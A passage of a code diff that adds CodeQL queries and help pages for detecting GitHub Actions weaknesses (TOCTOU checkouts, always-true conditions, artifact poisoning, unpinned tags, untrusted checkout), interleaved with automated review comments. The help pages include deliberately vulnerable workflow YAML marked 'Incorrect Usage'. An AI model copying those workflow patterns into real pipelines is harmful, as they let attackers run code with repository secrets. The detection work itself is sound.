+Verify that the code has not been modified after the security check. This may be achieved differently depending on the type of check:
+
+- Deployment Environment Approval: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`.
+- Label Gates: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`.
+
+## Examples
+
+### Incorrect Usage (Deployment Environment Approval)
+
+The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved.
+
+```yml
+on:
+ pull_request_target:
+ types: [Created]
+jobs:
+ test:
+ environment: NeedsApproval
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout from PR branch
+ uses: actions/checkout@v4
+ with:
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ ref: ${{ github.event.pull_request.head.ref }}
+ - run: ./cmd
+```
+
+### Correct Usage (Deployment Environment Approval)
+
+Use immutable references (Commit SHA) to make sure that the reviewed code does not change between the check and the use.
+
+```yml
+on:
+ pull_request_target:
+ types: [Created]
+jobs:
+ test:
+ environment: NeedsApproval
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout from PR branch
+ uses: actions/checkout@v4
+ with:
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ ref: ${{ github.event.pull_request.head.sha }}
+ - run: ./cmd
+```
+
+### Incorrect Usage (Label Gates)
+
+The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved.
+
+```yaml
+on:
+ pull_request_target:
+ types: [labeled]
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ if: contains(github.event.pull_request.labels.*.name, 'safe-to-test')
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.pull_request.head.ref }}
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ - run: ./cmd
+```
+
+### Correct Usage (Label Gates)
+
+Use immutable references (Commit SHA) to make sure that the reviewed code does not change between the check and the use.
+
+```yaml
+on:
+ pull_request_target:
+ types: [labeled]
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ if: contains(github.event.pull_request.labels.*.name, 'safe-to-test')
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ - run: ./cmd
+```
+
+## References
+
+- [ActionsTOCTOU](https://github.com/AdnaneKhan/ActionsTOCTOU)
diff --git a/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql
new file mode 100644
index 000000000000..2aacf20b35fc
--- /dev/null
+++ b/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql
@@ -0,0 +1,32 @@
+/**
+ * @name Untrusted Checkout TOCTOU
+ * @description Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check.
+ * @kind path-problem
+ * @problem.severity error
+ * @precision high
+ * @security-severity 9.3
+ * @id actions/untrusted-checkout-toctou/critical
+ * @tags actions
+ * security
+ * external/cwe/cwe-367
+ */
+
+import actions
+import codeql.actions.security.UntrustedCheckoutQuery
+import codeql.actions.security.PoisonableSteps
+import codeql.actions.security.ControlChecks
+
+query predicate edges(Step a, Step b) { a.getNextStep() = b }
+
+from MutableRefCheckoutStep checkout, PoisonableStep step, Event event
+where
+ // the checked-out code may lead to arbitrary code execution
+ checkout.getAFollowingStep() = step and
+ // the checkout occurs in a privileged context
+ inPrivilegedContext(checkout, event) and
+ // the mutable checkout step is protected by an Insufficient access check
+ exists(ControlCheck check1 | check1.protects(checkout, event, "untrusted-checkout")) and
+ not exists(ControlCheck check2 | check2.protects(checkout, event, "untrusted-checkout-toctou"))
+select step, checkout, step,
+ "Insufficient protection against execution of untrusted code on a privileged workflow ($@).",
+ event, event.getName()
diff --git a/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.md b/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.md
new file mode 100644
index 000000000000..4e9b389834e8
--- /dev/null
+++ b/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.md
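Review bot: The alert string `"Insufficient protection against execution of untrusted code on a privileged workflow ($@)."` does not state what the query found — a mutable ref that can be repointed after the gating check — so the reader has to open the query source to learn the TOCTOU angle; `"The checked-out code is selected by a mutable ref and can change after the access check, allowing execution of untrusted code on a privileged workflow ($@)."` would be self-explaining. The comment `// the mutable checkout step is protected by an Insufficient access check` is also misleading as written, since the check is adequate against the untrusted checkout itself and only fails to pin the ref afterwards; `// an untrusted-checkout control check guards the step, but nothing pins the ref after the gate` says what the two `exists` clauses test. A one-line note on how this relates to the sibling `actions/untrusted-checkout-toctou/high` query, whose hunk is outside this view, would also help.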
@@ -0,0 +1,102 @@ +# Untrusted Checkout TOCTOU (Time-of-check to time-of-use) + +## Description + +Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check. + +## Recommendations + +Verify that the code has not been modified after the security check. This may be achieved differently depending on the type of check: + +- Deployment Environment Approval: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`. +- Label Gates: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`. + +## Examples + +### Incorrect Usage (Deployment Environment Approval) + +The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved. + +```yml +on: + pull_request_target: + types: [Created] +jobs: + test: + environment: NeedsApproval + runs-on: ubuntu-latest + steps: + - name: Checkout from PR branch + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name }} + ref: ${{ github.event.pull_request.head.ref }} + - run: ./cmd +``` + +### Correct Usage (Deployment Environment Approval) + +Use immutable references (Commit SHA) to make sure that the reviewed code does not change between the check and the use. 
+ +```yml +on: + pull_request_target: + types: [Created] +jobs: + test: + environment: NeedsApproval + runs-on: ubuntu-latest + steps: + - name: Checkout from PR branch + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name }} + ref: ${{ github.event.pull_request.head.sha }} + - run: ./cmd +``` + +### Incorrect Usage (Label Gates) + +The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved. + +```yaml +on: + pull_request_target: + types: [labeled] + +jobs: + test: + runs-on: ubuntu-latest + if: contains(github.event.pull_request.labels.*.name, 'safe-to-test') + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: ./cmd +``` + +### Correct Usage (Label Gates) + +Use immutable references (Commit SHA) to make sure that the reviewed code does not change between the check and the use. + +```yaml +on: + pull_request_target: + types: [labeled] + +jobs: + test: + runs-on: ubuntu-latest + if: contains(github.event.pull_request.labels.*.name, 'safe-to-test') + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: ./cmd +``` + +## References + +- [ActionsTOCTOU](https://github.com/AdnaneKhan/ActionsTOCTOU) diff --git a/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql new file mode 100644 index 000000000000..dde6ae69c488 --- /dev/null +++ b/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql 
@@ -0,0 +1,30 @@
+/**
+ * @name Untrusted Checkout TOCTOU
+ * @description Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check.
+ * @kind problem
+ * @problem.severity error
+ * @precision high
+ * @security-severity 7.5
+ * @id actions/untrusted-checkout-toctou/high
+ * @tags actions
+ * security
+ * external/cwe/cwe-367
+ */
+
+import actions
+import codeql.actions.security.UntrustedCheckoutQuery
+import codeql.actions.security.PoisonableSteps
+import codeql.actions.security.ControlChecks
+
+from MutableRefCheckoutStep checkout, Event event
+where
+ // there are no evidences that the checked-out gets executed
+ not checkout.getAFollowingStep() instanceof PoisonableStep and
+ // the checkout occurs in a privileged context
+ inPrivilegedContext(checkout, event) and
+ // the mutable checkout step is protected by an Insufficient access check
+ exists(ControlCheck check1 | check1.protects(checkout, event, "untrusted-checkout")) and
+ not exists(ControlCheck check2 | check2.protects(checkout, event, "untrusted-checkout-toctou"))
+select checkout,
+ "Insufficient protection against execution of untrusted code on a privileged workflow ($@).",
+ event, event.getName()
diff --git a/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.md b/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.md
new file mode 100644
index 000000000000..1e7ea120cbaa
--- /dev/null
+++ b/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.md
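Review bot: The comment `// there are no evidences that the checked-out gets executed` is ungrammatical and drops its subject; suggest `// no evidence that the checked-out code is executed by a later step`. This query and UntrustedCheckoutTOCTOUCritical.ql both carry the identical `@name Untrusted Checkout TOCTOU`, so alerts from the two are indistinguishable by name in the results UI even though one has a known sink and the other does not; distinguishing the names (the `@id` already does) would help triage.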
@@ -0,0 +1,63 @@ +# If Condition Always Evaluates to True + +## Description + +GitHub Workflow Expressions (`${{ ... }}`) used in the `if` condition of jobs or steps must not contain extra characters or spaces. Otherwise, the condition is invariably evaluated to `true`. + +When an `if` condition erroneously evaluates to `true`, unintended steps may be executed, leading to logic bugs and potentially exposing parts of the workflow designed to run only in secure scenarios. This behavior subverts the intended conditional logic of the workflow, leading to potential security vulnerabilities and unintentional consequences. + +## Recommendation + +To avoid the vulnerability where an `if` condition always evaluates to `true`, it is crucial to eliminate any extra characters or spaces in your GitHub Actions expressions: + +1. Do not use `${{` and `}}` for Workflow Expressions in `if` conditions. +2. Avoid multiline or spaced-out conditional expressions that might inadvertently introduce unwanted characters or formatting. +3. Test the workflow to ensure the `if` conditions behave as expected under different scenarios. + +## Examples + +### Correct Usage + +1. Omit `${{` and `}}` in `if` conditions: + + ```yaml + if: steps.checks.outputs.safe_to_run == true + if: |- + steps.checks.outputs.safe_to_run == true + if: | + steps.checks.outputs.safe_to_run == true + ``` + +2. If using `${{` and `}}` Workflow Expressions, ensure the `if` condition is formatted correctly without extra spaces or characters: + + ```yaml + if: ${{ steps.checks.outputs.safe_to_run == true }} + if: |- + ${{ steps.checks.outputs.safe_to_run == true }} + ``` + +### Incorrect Usage + +1. Do not mix Workflow Expressions with un-delimited expressions: + + ```yaml + if: ${{ steps.checks.outputs.safe_to_run }} == true + ``` + +2. 
Do not include trailing new lines or spaces: + + ```yaml + if: | + ${{ steps.checks.outputs.safe_to_run == true }} + if: > + ${{ steps.checks.outputs.safe_to_run == true }} + if: " ${{ steps.checks.outputs.safe_to_run == true }}" + if: |+ + ${{ steps.checks.outputs.safe_to_run == true }} + if: >+ + ${{ steps.checks.outputs.safe_to_run == true }} + ``` + +## References + +- [Expression Always True Github Issue](https://github.com/actions/runner/issues/1173) diff --git a/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql b/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql new file mode 100644 index 000000000000..6eaaca6e05db --- /dev/null +++ b/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql @@ -0,0 +1,26 @@ +/** + * @name If expression always true + * @description Expressions used in If conditions with extra spaces are always true. + * @kind problem + * @security-severity 9.0 + * @problem.severity error + * @precision very-high + * @id actions/if-expression-always-true/critical + * @tags actions + * maintainability + * external/cwe/cwe-275 + */ + +import actions +import codeql.actions.security.ControlChecks + +from ControlCheck i +where + i.(If).getCondition().matches("%${{%") and + ( + not i.(If).getCondition().matches("${{%") or + not i.(If).getCondition().matches("%}}") + ) + or + count(i.(If).getCondition().splitAt("${{")) > 2 +select i, "Expression always evaluates to true" diff --git a/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md b/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md new file mode 100644 index 000000000000..1e7ea120cbaa --- /dev/null +++ b/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md 
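Review bot: `count(i.(If).getCondition().splitAt("${{")) > 2` counts distinct strings, because the one-argument `splitAt` yields its segments as a set; a condition whose segments repeat (two identical `${{ ... }}` fragments back to back) splits into fewer than three distinct parts and is not reported although it contains two expressions and the first disjunct does not catch it either. Testing for the existence of a third segment avoids the set semantics: `exists(i.(If).getCondition().splitAt("${{", 2))`. The same expression appears in ExpressionIsAlwaysTrueHigh.ql later in this diff. Separately, both queries sit under `CWE-571` but are tagged `external/cwe/cwe-275`, and neither has the `security` tag although both set `@security-severity`; the tag should be `external/cwe/cwe-571`, and as far as I know code scanning only applies a security severity to queries tagged `security`.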
@@ -0,0 +1,63 @@ +# If Condition Always Evaluates to True + +## Description + +GitHub Workflow Expressions (`${{ ... }}`) used in the `if` condition of jobs or steps must not contain extra characters or spaces. Otherwise, the condition is invariably evaluated to `true`. + +When an `if` condition erroneously evaluates to `true`, unintended steps may be executed, leading to logic bugs and potentially exposing parts of the workflow designed to run only in secure scenarios. This behavior subverts the intended conditional logic of the workflow, leading to potential security vulnerabilities and unintentional consequences. + +## Recommendation + +To avoid the vulnerability where an `if` condition always evaluates to `true`, it is crucial to eliminate any extra characters or spaces in your GitHub Actions expressions: + +1. Do not use `${{` and `}}` for Workflow Expressions in `if` conditions. +2. Avoid multiline or spaced-out conditional expressions that might inadvertently introduce unwanted characters or formatting. +3. Test the workflow to ensure the `if` conditions behave as expected under different scenarios. + +## Examples + +### Correct Usage + +1. Omit `${{` and `}}` in `if` conditions: + + ```yaml + if: steps.checks.outputs.safe_to_run == true + if: |- + steps.checks.outputs.safe_to_run == true + if: | + steps.checks.outputs.safe_to_run == true + ``` + +2. If using `${{` and `}}` Workflow Expressions, ensure the `if` condition is formatted correctly without extra spaces or characters: + + ```yaml + if: ${{ steps.checks.outputs.safe_to_run == true }} + if: |- + ${{ steps.checks.outputs.safe_to_run == true }} + ``` + +### Incorrect Usage + +1. Do not mix Workflow Expressions with un-delimited expressions: + + ```yaml + if: ${{ steps.checks.outputs.safe_to_run }} == true + ``` + +2. 
Do not include trailing new lines or spaces: + + ```yaml + if: | + ${{ steps.checks.outputs.safe_to_run == true }} + if: > + ${{ steps.checks.outputs.safe_to_run == true }} + if: " ${{ steps.checks.outputs.safe_to_run == true }}" + if: |+ + ${{ steps.checks.outputs.safe_to_run == true }} + if: >+ + ${{ steps.checks.outputs.safe_to_run == true }} + ``` + +## References + +- [Expression Always True Github Issue](https://github.com/actions/runner/issues/1173) diff --git a/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql b/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql new file mode 100644 index 000000000000..6b0c69977612 --- /dev/null +++ b/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql @@ -0,0 +1,29 @@ +/** + * @name If expression always true + * @description Expressions used in If conditions with extra spaces are always true. + * @kind problem + * @problem.severity error + * @precision high + * @security-severity 7.5 + * @id actions/if-expression-always-true/high + * @tags actions + * maintainability + * external/cwe/cwe-275 + */ + +import actions +import codeql.actions.security.ControlChecks + +from If i +where + not i instanceof ControlCheck and + ( + i.getCondition().matches("%${{%") and + ( + not i.getCondition().matches("${{%") or + not i.getCondition().matches("%}}") + ) + or + count(i.getCondition().splitAt("${{")) > 2 + ) +select i, "Expression always evaluates to true" diff --git a/actions/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md b/actions/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md new file mode 100644 index 000000000000..9b1782d6ba84 --- /dev/null +++ b/actions/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md 
@@ -0,0 +1,72 @@ +# Artifact poisoning + +## Description + +The workflow downloads artifacts that may be poisoned by an attacker in previously triggered workflows. If the contents of these artifacts are not correctly extracted, stored and verified, they may lead to repository compromise if untrusted code gets executed in a privileged job. + +## Recommendations + +- Always consider artifacts content as untrusted. +- Extract the contents of artifacts to a temporary folder so they cannot override existing files. +- Verify the contents of the artifacts downloaded. If an artifact is expected to contain a numeric value, verify it before using it. + +## Examples + +### Incorrect Usage + +The following workflow downloads an artifact that can potentially be controlled by an attacker and then runs a script from the runner workspace. Because the `dawidd6/action-download-artifact` by default downloads and extracts the contents of the artifacts overriding existing files, an attacker will be able to override the contents of `cmd.sh` and gain code execution when this file gets executed. + +```yaml +name: Insecure Workflow + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - uses: dawidd6/action-download-artifact@v2 + with: + name: pr_number + - name: Run command + run: | + sh cmd.sh +``` + +### Correct Usage + +The following example, correctly creates a temporary directory and extracts the contents of the artifact there before calling `cmd.sh`. 
+ +```yaml +name: Insecure Workflow + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - run: mkdir -p ${{ runner.temp }}/artifacts/ + - uses: dawidd6/action-download-artifact@v2 + with: + name: pr_number + path: ${{ runner.temp }}/artifacts/ + + - name: Run command + run: | + sh cmd.sh +``` + +## References + +- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/) diff --git a/actions/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql b/actions/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql new file mode 100644 index 000000000000..afef7bdd82b2 --- /dev/null +++ b/actions/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql @@ -0,0 +1,28 @@ +/** + * @name Artifact poisoning + * @description An attacker may be able to poison the workflow's artifacts and influence on consequent steps. + * @kind path-problem + * @problem.severity error + * @precision very-high + * @security-severity 9 + * @id actions/artifact-poisoning/critical + * @tags actions + * security + * external/cwe/cwe-829 + */ + +import actions +import codeql.actions.security.ArtifactPoisoningQuery +import ArtifactPoisoningFlow::PathGraph +import codeql.actions.security.ControlChecks + +from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink, Event event +where + ArtifactPoisoningFlow::flowPath(source, sink) and + inPrivilegedContext(sink.getNode().asExpr(), event) and + not exists(ControlCheck check | + check.protects(sink.getNode().asExpr(), event, "artifact-poisoning") + ) +select sink.getNode(), source, sink, + "Potential artifact poisoning in $@, which may be controlled by an external user ($@).", sink, + sink.getNode().toString(), event, event.getName() 
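Review bot: `@description ... and influence on consequent steps` is awkward English; suggest `... and influence subsequent steps`. The identical sentence is repeated in ArtifactPoisoningMedium.ql and ArtifactPoisoningPathTraversal.ql later in this diff. The Medium query omits the `ControlCheck` exclusion this one applies after `inPrivilegedContext`; if a non-privileged context is assumed never to need a gate, a comment on the `inNonPrivilegedContext` line there would make the asymmetry deliberate rather than accidental.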
diff --git a/actions/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md b/actions/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md new file mode 100644 index 000000000000..9b1782d6ba84 --- /dev/null +++ b/actions/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md 
@@ -0,0 +1,72 @@ +# Artifact poisoning + +## Description + +The workflow downloads artifacts that may be poisoned by an attacker in previously triggered workflows. If the contents of these artifacts are not correctly extracted, stored and verified, they may lead to repository compromise if untrusted code gets executed in a privileged job. + +## Recommendations + +- Always consider artifacts content as untrusted. +- Extract the contents of artifacts to a temporary folder so they cannot override existing files. +- Verify the contents of the artifacts downloaded. If an artifact is expected to contain a numeric value, verify it before using it. + +## Examples + +### Incorrect Usage + +The following workflow downloads an artifact that can potentially be controlled by an attacker and then runs a script from the runner workspace. Because the `dawidd6/action-download-artifact` by default downloads and extracts the contents of the artifacts overriding existing files, an attacker will be able to override the contents of `cmd.sh` and gain code execution when this file gets executed. + +```yaml +name: Insecure Workflow + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - uses: dawidd6/action-download-artifact@v2 + with: + name: pr_number + - name: Run command + run: | + sh cmd.sh +``` + +### Correct Usage + +The following example, correctly creates a temporary directory and extracts the contents of the artifact there before calling `cmd.sh`. 
+ +```yaml +name: Insecure Workflow + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - run: mkdir -p ${{ runner.temp }}/artifacts/ + - uses: dawidd6/action-download-artifact@v2 + with: + name: pr_number + path: ${{ runner.temp }}/artifacts/ + + - name: Run command + run: | + sh cmd.sh +``` + +## References + +- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/) diff --git a/actions/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql b/actions/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql new file mode 100644 index 000000000000..992b2aa8c5d4 --- /dev/null +++ b/actions/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql @@ -0,0 +1,25 @@ +/** + * @name Artifact poisoning + * @description An attacker may be able to poison the workflow's artifacts and influence on consequent steps. + * @kind path-problem + * @problem.severity warning + * @precision high + * @security-severity 5.0 + * @id actions/artifact-poisoning/medium + * @tags actions + * security + * external/cwe/cwe-829 + */ + +import actions +import codeql.actions.security.ArtifactPoisoningQuery +import ArtifactPoisoningFlow::PathGraph +import codeql.actions.security.ControlChecks + +from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink +where + ArtifactPoisoningFlow::flowPath(source, sink) and + inNonPrivilegedContext(sink.getNode().asExpr()) +select sink.getNode(), source, sink, + "Potential artifact poisoning in $@, which may be controlled by an external user.", sink, + sink.getNode().toString() diff --git a/actions/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql b/actions/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql new file mode 100644 index 000000000000..519437ddb229 --- /dev/null 
+++ b/actions/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql
@@ -0,0 +1,44 @@
+/**
+ * @name Artifact Poisoning (Path Traversal).
+ * @description An attacker may be able to poison the workflow's artifacts and influence on consequent steps.
+ * @kind problem
+ * @problem.severity error
+ * @precision very-high
+ * @security-severity 9
+ * @id actions/artifact-poisoning/path-traversal
+ * @tags actions
+ * security
+ * experimental
+ * external/cwe/cwe-829
+ */
+
+import actions
+import codeql.actions.security.PoisonableSteps
+import codeql.actions.security.UseOfKnownVulnerableActionQuery
+
+from UsesStep download, KnownVulnerableAction vulnerable_action, Event event
+where
+ event = download.getATriggerEvent() and
+ vulnerable_action.getVulnerableAction() = download.getCallee() and
+ download.getCallee() = "actions/download-artifact" and
+ (
+ download.getVersion() = vulnerable_action.getVulnerableVersion() or
+ download.getVersion() = vulnerable_action.getVulnerableSha()
+ ) and
+ (
+ // exists a poisonable upload artifact in the same workflow
+ exists(UsesStep checkout, PoisonableStep poison, UsesStep upload |
+ download.getEnclosingWorkflow().getAJob().(LocalJob).getAStep() = checkout and
+ download.getEnclosingJob().isPrivilegedExternallyTriggerable(event) and
+ checkout.getCallee() = "actions/checkout" and
+ checkout.getAFollowingStep() = poison and
+ poison.getAFollowingStep() = upload and
+ upload.getCallee() = "actions/upload-artifact"
+ )
+ or
+ // upload artifact is not used in the same workflow
+ not exists(UsesStep upload |
+ download.getEnclosingWorkflow().getAJob().(LocalJob).getAStep() = upload
+ )
+ )
+select download, "Potential artifact poisoning"
diff --git a/actions/ql/src/Security/CWE-829/UnpinnedActionsTag.md b/actions/ql/src/Security/CWE-829/UnpinnedActionsTag.md
new file mode 100644
index 000000000000..d7c114f0404e
--- /dev/null
+++ b/actions/ql/src/Security/CWE-829/UnpinnedActionsTag.md
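Review bot: The second disjunct `not exists(UsesStep upload | download.getEnclosingWorkflow().getAJob().(LocalJob).getAStep() = upload)` can never hold, because `upload` ranges over every `UsesStep` and `download` is itself one of the workflow's steps (assuming its job is a `LocalJob`, the only kind with steps); the comment says the intent is "no upload-artifact step in this workflow", so the body needs `and upload.getCallee() = "actions/upload-artifact"`. As written the query silently reduces to the first disjunct, so the "download without a matching upload" case this branch was meant to flag is never reported. `@name Artifact Poisoning (Path Traversal).` carries a trailing period no other query name in this diff has, and the `@description` is copied from the generic artifact-poisoning queries and does not mention that this query is specifically about known-vulnerable `actions/download-artifact` versions.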
@@ -0,0 +1,27 @@ +# Unpinned tag for 3rd party Action in workflow + +## Description + +Using a tag for a 3rd party Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack. + +## Recommendations + +Pinning an action to a full length commit SHA is currently the only way to use a non-immutable action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as they would need to generate a SHA-1 collision for a valid Git object payload. When selecting a SHA, you should verify it is from the action's repository and not a repository fork. + +## Examples + +### Incorrect Usage + +```yaml +- uses: tj-actions/changed-files@v44 +``` + +### Correct Usage + +```yaml +- uses: tj-actions/changed-files@c65cd883420fd2eb864698a825fc4162dd94482c # v44 +``` + +## References + +- [Using third-party actions](https://docs.github.com/en/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions#using-third-party-actions) diff --git a/actions/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/actions/ql/src/Security/CWE-829/UnpinnedActionsTag.ql new file mode 100644 index 000000000000..de8d3c2078a8 --- /dev/null +++ b/actions/ql/src/Security/CWE-829/UnpinnedActionsTag.ql 
@@ -0,0 +1,40 @@
+/**
+ * @name Unpinned tag for a non-immutable Action in workflow
+ * @description Using a tag for a non-immutable Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack.
+ * @kind problem
+ * @security-severity 5.0
+ * @problem.severity recommendation
+ * @precision high
+ * @id actions/unpinned-tag
+ * @tags security
+ * actions
+ * external/cwe/cwe-829
+ */
+
+import actions
+import codeql.actions.security.UseOfUnversionedImmutableAction
+
+bindingset[version]
+private predicate isPinnedCommit(string version) { version.regexpMatch("^[A-Fa-f0-9]{40}$") }
+
+bindingset[repo]
+private predicate isTrustedOrg(string repo) {
+ repo.matches(["actions", "github", "advanced-security"] + "/%")
+}
+
+from UsesStep uses, string repo, string version, Workflow workflow, string name
+where
+ uses.getCallee() = repo and
+ uses.getEnclosingWorkflow() = workflow and
+ (
+ workflow.getName() = name
+ or
+ not exists(workflow.getName()) and workflow.getLocation().getFile().getBaseName() = name
+ ) and
+ uses.getVersion() = version and
+ not isTrustedOrg(repo) and
+ not isPinnedCommit(version) and
+ not isImmutableAction(uses, repo)
+select uses.getCalleeNode(),
+ "Unpinned 3rd party Action '" + name + "' step $@ uses '" + repo + "' with ref '" + version +
+ "', not a pinned commit hash", uses, uses.toString()
diff --git a/actions/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md b/actions/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md
new file mode 100644
index 000000000000..71ba2032a9d0
--- /dev/null
+++ b/actions/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md
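Review bot: `isPinnedCommit` and `isTrustedOrg` have no QLDoc, and the latter encodes a trust decision that the accompanying qhelp never mentions: references to `actions/`, `github/` and `advanced-security/` are exempted, so a user who expects every non-SHA third-party reference to be flagged will be surprised by the silence. Suggest `/** Holds if `version` is a full 40-hex-digit commit SHA. */` on the first and `/** Holds if `repo` is owned by a GitHub-operated organization whose actions are exempt from pinning. */` on the second, plus a sentence in the qhelp listing the exemption. Also worth a comment is that `regexpMatch("^[A-Fa-f0-9]{40}$")` deliberately accepts only SHA-1 length, which is what GitHub-hosted repositories use today.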
@@ -0,0 +1,137 @@ +# Execution of Untrusted Checked-out Code + +## Description + +GitHub workflows can be triggered through various repository events, including incoming pull requests (PRs) or comments on Issues/PRs. A potentially dangerous misuse of the triggers such as `pull_request_target` or `issue_comment` followed by an explicit checkout of untrusted code (Pull Request HEAD) may lead to repository compromise if untrusted code gets executed in a privileged job. + +## Recommendations + +- Avoid using `pull_request_target` unless necessary. +- Employ unprivileged `pull_request` workflows followed by `workflow_run` for privileged operations. +- Use labels like `safe to test` to vet PRs and manage the execution context appropriately. + +The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second privileged workflow with the access to repository secrets, triggered by the completion of the first workflow using `workflow_run` trigger event, downloads the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). + +The artifacts downloaded from the first workflow should be considered untrusted and must be verified. 
+ +## Examples + +### Incorrect Usage + +The following workflow checks-out untrusted code in a privileged context and runs user-controlled code (in this case package.json scripts) which will grant privileged access to the attacker: + +```yaml +on: pull_request_target + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! +``` + +### Correct Usage + +An example shows how to use two workflows: one for processing the untrusted PR and the other for using the results in a safe context. + +**ReceivePR.yml** (untrusted PR handling with artifact creation): + +```yaml +name: Receive PR +on: + pull_request: +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - name: Build + run: /bin/bash ./build.sh + - name: Save PR number + run: | + mkdir -p ./pr + echo ${{ github.event.number }} > ./pr/NR + - uses: 